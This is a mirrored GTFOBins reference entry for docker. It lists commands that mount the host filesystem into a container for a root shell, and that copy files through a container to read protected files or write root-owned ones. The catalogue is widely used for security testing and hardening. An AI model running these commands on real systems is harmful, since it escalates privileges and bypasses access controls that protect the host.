1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/docker.md

29 lines
1.4 KiB
Markdown
Raw Normal View History

2018-08-17 17:16:09 +02:00
---
description: |
This requires the user to be privileged enough to run docker, i.e. being in the `docker` group or being `root`.
2018-08-17 17:16:09 +02:00
functions:
shell:
- description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.
code: docker run -v /:/mnt --rm -it alpine chroot /mnt sh
file-write:
- description: Write any file by copying it to an existing container and back to the target destination on the host. The file will be owned by root.
code: |
CONTAINER_ID=existing-docker-container
echo "sensitive config" > /tmp/file.txt
sudo docker cp /tmp/file.txt $CONTAINER_ID:/tmp/file.txt
sudo docker cp $CONTAINER_ID:/tmp/file.txt /target/destination.txt
file-read:
- description: Read any file by copying it to an existing container and back to a new location on the host.
code: |
CONTAINER_ID=existing-docker-container
sudo docker cp /root/protected.txt $CONTAINER_ID:/tmp/file.txt
sudo docker cp $CONTAINER_ID:/tmp/file.txt /home/user/file.txt
cat /home/user/file.txt
2018-10-05 19:55:38 +02:00
sudo:
- description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.
code: sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
2018-10-05 19:55:38 +02:00
suid:
- description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.
code: ./docker run -v /:/mnt --rm -it alpine chroot /mnt sh
2018-08-17 17:16:09 +02:00
---